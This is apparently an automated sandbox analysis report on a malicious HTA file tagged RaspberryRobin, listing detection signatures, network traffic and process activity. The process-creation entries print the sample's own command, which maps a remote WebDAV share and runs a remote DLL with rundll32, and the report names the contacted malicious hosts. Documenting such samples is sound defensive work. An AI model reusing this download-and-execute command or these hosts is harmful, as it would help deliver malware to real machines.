Windows Analysis Report
jqplot.hta

Overview

General Information

Sample name: jqplot.hta
Analysis ID: 1579287
MD5: 9f0c22ed3d7bb9da739c0435a03b8fc0
SHA1: 6589ff833c4325cd6f580f8e33ed10bf0bd86ead
SHA256: 69febfcc81d9b79faacbea1468bd0d88508025308a6741d8e2fbd6f7b100c283
Tags: htaRaspberryRobinuser-aachum
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Gathers information about network shares
Sigma detected: Suspicious MSHTA Child Process
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.1% probability
Source: unknown HTTPS traffic detected: 104.21.90.205:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49731 version: TLS 1.2
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 147.45.112.248:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /2l5hd077he70d HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 969d6a2f.respectfulnesses.makeupConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /2l5hd077he70d HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 969d6a2f.respectfulnesses.makeupConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nz/mw/37.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: 6t.lc
Source: global traffic DNS traffic detected: DNS query: 969d6a2f.respectfulnesses.makeup
Source: global traffic DNS traffic detected: DNS query: 6t.lc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:02:30 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:02:51 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:02:53 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:02:55 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:02:57 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Sat, 21 Dec 2024 12:03:00 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1384360474.0000000000735000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1352202628.0000000000725000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/
Source: net.exe, 0000000C.00000003.1384445225.000000000071F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/A#
Source: net.exe, 0000000C.00000003.1352202628.0000000000725000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/L#
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz&
Source: net.exe, 0000000C.00000002.1494593782.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://6t.lc/nz6v
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/
Source: mshta.exe, 00000000.00000002.1359717276.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259253461.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/2l5hd077he70d
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1358804675.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359732065.0000000002DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359274340.0000000002DC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/2l5hd077he70d5hd077he70d
Source: mshta.exe, 00000000.00000003.1357251887.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1359012847.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359779008.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://969d6a2f.respectfulnesses.makeup/WQ
Source: mshta.exe, 00000000.00000003.1357441003.0000000002D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1358992498.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1359686126.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 104.21.90.205:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.112.248:443 -> 192.168.2.7:49731 version: TLS 1.2
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053998B0 NtCreateThreadEx, 20_2_053998B0
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B10F4 20_2_050B10F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B1200 20_2_050B1200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB640 20_2_050BB640
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BF189 20_2_050BF189
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BA580 20_2_050BA580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B679F 20_2_050B679F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C4394 20_2_050C4394
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2FA8 20_2_050C2FA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B83C4 20_2_050B83C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B22DC 20_2_050B22DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B73D4 20_2_050B73D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05395B10 20_2_05395B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05396700 20_2_05396700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05393D40 20_2_05393D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053998B0 20_2_053998B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539A080 20_2_0539A080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539B2D0 20_2_0539B2D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05391020 20_2_05391020
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05393250 20_2_05393250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_05398850 20_2_05398850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0539AA40 20_2_0539AA40
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal56.spyw.evad.winHTA@15/0@2/2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\jqplot.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time%
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 200
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c net use V: \\6t.lc@ssl\nz && C:\Windows\system32\rundll32 V:\mw\37.dll,%time% Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 200 && net use V: /d /y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: \\6t.lc@ssl\nz Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32 V:\mw\37.dll, 7:02:13.25 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 200 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net use V: /d /y Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BA508 push esi; mov dword ptr [esp], ecx 20_2_050BA509
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2F5F push esi; mov dword ptr [esp], ecx 20_2_050C2F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C4384 push esi; mov dword ptr [esp], ecx 20_2_050C4385
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB5B0 push esi; mov dword ptr [esp], ecx 20_2_050BB5B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B73B4 push esi; mov dword ptr [esp], ecx 20_2_050B73B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21D4 push esi; mov dword ptr [esp], ecx 20_2_050B21D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C42E8 push esi; mov dword ptr [esp], ecx 20_2_050C42E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21E4 push esi; mov dword ptr [esp], ecx 20_2_050B21E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B21F8 push esi; mov dword ptr [esp], ecx 20_2_050B21F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050C2EF6 push esi; mov dword ptr [esp], 000000CAh 20_2_050C2EF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050BB5F5 push esi; mov dword ptr [esp], B0C44C70h 20_2_050BB5F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_050B56F4 push esi; mov dword ptr [esp], ecx 20_2_050B56F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_053A7570 push esi; mov dword ptr [esp], DC652A4Bh 20_2_053A7571
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: \KnownDlls32\testAPp.eXe Jump to behavior
